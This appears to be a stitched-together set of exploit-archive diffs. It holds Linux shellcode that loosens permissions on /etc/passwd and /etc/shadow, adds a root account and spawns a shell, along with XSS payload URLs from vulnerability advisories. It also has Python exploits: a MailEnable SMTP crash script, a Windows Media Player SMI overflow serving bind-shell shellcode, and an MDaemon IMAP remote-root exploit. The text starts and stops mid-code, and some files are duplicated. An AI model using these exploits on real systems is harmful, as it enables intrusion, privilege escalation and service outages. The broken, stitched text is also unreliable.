10: 53 push %ebx
11: 68 2f 70 61 73 push $0x7361702f
16: 68 2f 65 74 63 push $0x6374652f
1b: 89 e3 mov %esp,%ebx
1d: 68 41 41 ff 01 push $0x1ff4141
22: 59 pop %ecx
23: c1 e9 08 shr $0x8,%ecx
26: c1 e9 08 shr $0x8,%ecx
29: cd 80 int $0x80
2b: 6a 0f push $0xf
2d: 58 pop %eax
2e: 68 6a 64 6f 77 push $0x776f646a
33: 5b pop %ebx
34: c1 eb 08 shr $0x8,%ebx
37: 53 push %ebx
38: 68 2f 73 68 61 push $0x6168732f
3d: 68 2f 65 74 63 push $0x6374652f
42: 89 e3 mov %esp,%ebx
44: 68 41 41 ff 01 push $0x1ff4141
49: 59 pop %ecx
4a: c1 e9 08 shr $0x8,%ecx
4d: c1 e9 08 shr $0x8,%ecx
50: cd 80 int $0x80
52: 6a 05 push $0x5
54: 58 pop %eax
55: 68 41 73 77 64 push $0x64777341
5a: 5b pop %ebx
5b: c1 eb 08 shr $0x8,%ebx
5e: 53 push %ebx
5f: 68 2f 70 61 73 push $0x7361702f
64: 68 2f 65 74 63 push $0x6374652f
69: 89 e3 mov %esp,%ebx
6b: 68 41 41 01 04 push $0x4014141
70: 59 pop %ecx
71: c1 e9 08 shr $0x8,%ecx
74: c1 e9 08 shr $0x8,%ecx
77: cd 80 int $0x80
79: 89 c3 mov %eax,%ebx
7b: 6a 04 push $0x4
7d: 58 pop %eax
7e: 68 41 73 68 0a push $0xa687341
83: 59 pop %ecx
84: c1 e9 08 shr $0x8,%ecx
87: 51 push %ecx
88: 68 6e 2f 62 61 push $0x61622f6e
8d: 68 3a 2f 62 69 push $0x69622f3a
92: 68 72 6f 6f 74 push $0x746f6f72
97: 68 4c 49 3a 2f push $0x2f3a494c
9c: 68 3a 30 3a 41 push $0x413a303a
a1: 68 4b 2e 3a 30 push $0x303a2e4b
a6: 68 66 77 55 57 push $0x57557766
ab: 68 68 70 31 50 push $0x50317068
b0: 68 7a 59 65 41 push $0x4165597a
b5: 68 41 61 41 51 push $0x51416141
ba: 68 49 38 75 74 push $0x74753849
bf: 68 50 4d 59 68 push $0x68594d50
c4: 68 54 42 74 7a push $0x7a744254
c9: 68 51 2f 38 54 push $0x54382f51
ce: 68 45 36 6d 67 push $0x676d3645
d3: 68 76 50 2e 73 push $0x732e5076
d8: 68 4e 58 52 37 push $0x3752584e
dd: 68 39 4b 55 48 push $0x48554b39
e2: 68 72 2f 59 42 push $0x42592f72
e7: 68 56 78 4b 47 push $0x474b7856
ec: 68 39 55 66 5a push $0x5a665539
f1: 68 46 56 6a 68 push $0x686a5646
f6: 68 46 63 38 79 push $0x79386346
fb: 68 70 59 6a 71 push $0x716a5970
100: 68 77 69 53 68 push $0x68536977
105: 68 6e 54 67 54 push $0x5467546e
10a: 68 58 4d 69 37 push $0x37694d58
10f: 68 2f 41 6e 24 push $0x246e412f
114: 68 70 55 6e 4d push $0x4d6e5570
119: 68 24 36 24 6a push $0x6a243624
11e: 68 41 4c 49 3a push $0x3a494c41
123: 89 e1 mov %esp,%ecx
125: ba 41 41 41 7f mov $0x7f414141,%edx
12a: c1 ea 08 shr $0x8,%edx
12d: c1 ea 08 shr $0x8,%edx
130: c1 ea 08 shr $0x8,%edx
133: cd 80 int $0x80
135: 31 c0 xor %eax,%eax
137: b0 46 mov $0x46,%al
139: 31 db xor %ebx,%ebx
13b: 31 c9 xor %ecx,%ecx
13d: cd 80 int $0x80
13f: 31 c0 xor %eax,%eax
141: b0 46 mov $0x46,%al
143: 31 db xor %ebx,%ebx
145: 31 c9 xor %ecx,%ecx
147: cd 80 int $0x80
149: 68 59 59 59 59 push $0x59595959
14e: 68 58 58 58 58 push $0x58585858
153: 68 2f 73 68 42 push $0x4268732f
158: 68 2f 62 69 6e push $0x6e69622f
15d: 89 e3 mov %esp,%ebx
15f: 31 c0 xor %eax,%eax
161: 88 43 07 mov %al,0x7(%ebx)
164: 89 5b 08 mov %ebx,0x8(%ebx)
167: 89 43 0c mov %eax,0xc(%ebx)
16a: b0 0b mov $0xb,%al
16c: 8d 4b 08 lea 0x8(%ebx),%ecx
16f: 8d 53 0c lea 0xc(%ebx),%edx
172: cd 80 int $0x80
174: b0 01 mov $0x1,%al
176: b3 01 mov $0x1,%bl
178: cd 80 int $0x80
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x6a\x0f\x58\x68\x6a\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x0f\x58\x68\x6a\x64\x6f\x77\x5b\xc1\xeb\x08\x53\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x05\x58\x68\x41\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\x68\x6e\x2f\x62\x61\x68\x3a\x2f\x62\x69\x68\x72\x6f\x6f\x74\x68\x4c\x49\x3a\x2f\x68\x3a\x30\x3a\x41\x68\x4b\x2e\x3a\x30\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\x68\x41\x4c\x49\x3a\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x59\x59\x59\x59\x68\x58\x58\x58\x58\x68\x2f\x73\x68\x42\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41447/info
Exponent CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Exponent 0.97.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules/slideshowmodule/slideshow.js.php?u=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E

12
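--- a/platforms/php/webapps/34266.txt
+++ b/platforms/php/webapps/34266.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/41448/info
+RunCms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+RunCms 2.1 is vulnerable; other versions may also be affected.
+The following example request is available:
+wget --user-agent="
+" http://www.example.com/modules/forum/check.php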

14
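--- a/platforms/php/webapps/34268.txt
+++ b/platforms/php/webapps/34268.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/41453/info
+Worxware DCP-Portal is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+DCP-Portal 7.0 Beta is vulnerable; other versions may also be affected.
+http://www.example.com/common/components/editor/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/modules/newsletter/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/php/editor.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/modules/gallery/view_img.php?imgtitle=%3C/title%3E%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/modules/gallery/view_img.php?imagename=%22&#039;);window.alert(&#039;XSS&#039;);document.write(&#039;%22
+http://www.example.com/modules/tips/show_tip.php?newsId=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E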

11
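--- a/platforms/php/webapps/34269.txt
+++ b/platforms/php/webapps/34269.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41456/info
+Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+Pligg 1.0.4 is vulnerable; other versions may also be affected.
+http://www.example.com/install/install1.php?language=%22%20onmouseover=alert()%3E
+http://www.example.com/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E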


@ -1,93 +1,93 @@
#!/usr/bin/python
##########################################################################
#
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
# Bug discovered by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Standard Edition all versions
# Professional Edition all versions
# Enterprise Edition all versions
# Tested on OS : Windows 2000 SP4 English
# Windows 2003 Standard Edition Italian
# Windows XP SP2 English
# Discovery Date : 02/24/2008
# Initial vendor notification : 03/06/2008
# Coordinated public disclosure: 03/11/2008
#
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
#
#-------------------------------------------------------------------------
#
# THX TO muts at offensive-security.com :
# I'll promise you: next time i'll find an easier one and get my shell :P
#
#-------------------------------------------------------------------------
##########################################################################
#
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
# [+] Connecting to 192.168.1.245 on port 25
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
# 03/06/08 13:20:49
#
# [+] Sending evilbuffer...
# [+] Waiting 10 secs before reconnecting...
# [+] Reconnecting...
# [+] SMTP Server died!
# [+] Connection refused
#
##########################################################################
from socket import *
from optparse import OptionParser
import sys, time
usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-c", "--command", type="string",
action="store", dest="COMMAND",
help="Command: VRFY or EXPN ; defualt VRFY")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
COMMAND = options.COMMAND
if not (HOST and PORT):
parser.print_help()
sys.exit()
if not COMMAND:
COMMAND = 'VRFY'
print "[+] Using default command VRFY"
else:
COMMAND = COMMAND.upper().strip()
if COMMAND != 'VRFY' and COMMAND != 'EXPN':
print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
sys.exit()
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connecting to %s on port %d" % (HOST, PORT)
print s.recv(1024)
print "[+] Sending evilbuffer..."
s.send(evilbuf)
s.close()
print "[+] Waiting 10 secs before reconnecting..."
time.sleep(10)
try:
s = socket(AF_INET, SOCK_STREAM)
print "[+] Reconnecting..."
s.connect((HOST, PORT))
except error, e:
print "[+] SMTP Server died!"
print "[+] %s" % e[1]
else:
print "[-] SMTP Server is still up"
print "[-] This probably means that is not vulnerable"
s.close()
# milw0rm.com [2008-03-11]
#!/usr/bin/python
##########################################################################
#
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
# Bug discovered by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Standard Edition all versions
# Professional Edition all versions
# Enterprise Edition all versions
# Tested on OS : Windows 2000 SP4 English
# Windows 2003 Standard Edition Italian
# Windows XP SP2 English
# Discovery Date : 02/24/2008
# Initial vendor notification : 03/06/2008
# Coordinated public disclosure: 03/11/2008
#
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
#
#-------------------------------------------------------------------------
#
# THX TO muts at offensive-security.com :
# I'll promise you: next time i'll find an easier one and get my shell :P
#
#-------------------------------------------------------------------------
##########################################################################
#
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
# [+] Connecting to 192.168.1.245 on port 25
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
# 03/06/08 13:20:49
#
# [+] Sending evilbuffer...
# [+] Waiting 10 secs before reconnecting...
# [+] Reconnecting...
# [+] SMTP Server died!
# [+] Connection refused
#
##########################################################################
from socket import *
from optparse import OptionParser
import sys, time
usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-c", "--command", type="string",
action="store", dest="COMMAND",
help="Command: VRFY or EXPN ; defualt VRFY")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
COMMAND = options.COMMAND
if not (HOST and PORT):
parser.print_help()
sys.exit()
if not COMMAND:
COMMAND = 'VRFY'
print "[+] Using default command VRFY"
else:
COMMAND = COMMAND.upper().strip()
if COMMAND != 'VRFY' and COMMAND != 'EXPN':
print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
sys.exit()
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connecting to %s on port %d" % (HOST, PORT)
print s.recv(1024)
print "[+] Sending evilbuffer..."
s.send(evilbuf)
s.close()
print "[+] Waiting 10 secs before reconnecting..."
time.sleep(10)
try:
s = socket(AF_INET, SOCK_STREAM)
print "[+] Reconnecting..."
s.connect((HOST, PORT))
except error, e:
print "[+] SMTP Server died!"
print "[+] %s" % e[1]
else:
print "[-] SMTP Server is still up"
print "[-] This probably means that is not vulnerable"
s.close()
# milw0rm.com [2008-03-11]


@ -1,118 +1,118 @@
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# http://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#
# badrobot:/home/matte# ./mplayer.py
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Documents and Settings\ryujin\Desktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
# Connection-specific DNS Suffix . :
# IP Address. . . . . . . . . . . . : 192.168.1.243
# Subnet Mask . . . . . . . . . . . : 255.255.255.0
# Default Gateway . . . . . . . . . :
#
# C:\Documents and Settings\ryujin\Desktop>
##########################################################################
from socket import *
# SMI BODY
body = """<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P {
font-size: 1em;
font-family: Arial;
font-weight: normal;
color: #FFFFFF;
background: #000000;
text-align: center;
padding-left: 5px;
padding-right: 5px;
padding-bottom: 2px;
}
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
<SYNC Start="0" pippo=\""""
# Metasploit bind shell on port 4444 EXITFUNC seh
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
)
body += 21988*'A'
body += '\x90'*16 # NOP Slide
body += shellcode + 'C'*67 # to SEH...
body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77' # ShortJmp, and SEH overwrite
body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode
body += 143505*'E' + '">'
body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
# RESPONSE HEADER
header = (
'HTTP/1.1 200 OK\r\n'
'Content-Type: application/smil\r\n'
'\r\n'
)
evilbuf = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evilbuf)
print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
c.close()
s.close()
# milw0rm.com [2008-01-08]
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# http://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#
# badrobot:/home/matte# ./mplayer.py
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Documents and Settings\ryujin\Desktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
# Connection-specific DNS Suffix . :
# IP Address. . . . . . . . . . . . : 192.168.1.243
# Subnet Mask . . . . . . . . . . . : 255.255.255.0
# Default Gateway . . . . . . . . . :
#
# C:\Documents and Settings\ryujin\Desktop>
##########################################################################
from socket import *
# SMI BODY
body = """<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P {
font-size: 1em;
font-family: Arial;
font-weight: normal;
color: #FFFFFF;
background: #000000;
text-align: center;
padding-left: 5px;
padding-right: 5px;
padding-bottom: 2px;
}
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
<SYNC Start="0" pippo=\""""
# Metasploit bind shell on port 4444 EXITFUNC seh
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
)
body += 21988*'A'
body += '\x90'*16 # NOP Slide
body += shellcode + 'C'*67 # to SEH...
body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77' # ShortJmp, and SEH overwrite
body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode
body += 143505*'E' + '">'
body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
# RESPONSE HEADER
header = (
'HTTP/1.1 200 OK\r\n'
'Content-Type: application/smil\r\n'
'\r\n'
)
evilbuf = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evilbuf)
print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
c.close()
s.close()
# milw0rm.com [2008-01-08]


@ -1,155 +1,155 @@
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>whoami
# whoami
# NT AUTHORITY\SYSTEM
#
# C:\MDaemon\APP>
##############################################################################
from socket import *
from optparse import OptionParser
import sys, time
print "[*********************************************************************]"
print "[* *]"
print "[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]"
print "[* DISCOVERED AND CODED *]"
print "[* by *]"
print "[* MATTEO MEMELLI *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-l", "--login-user", type="string",
action="store", dest="USER",
help="User login")
parser.add_option("-p", "--login-password", type="string",
action="store", dest="PASSWD",
help="User password")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
parser.print_help()
sys.exit()
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
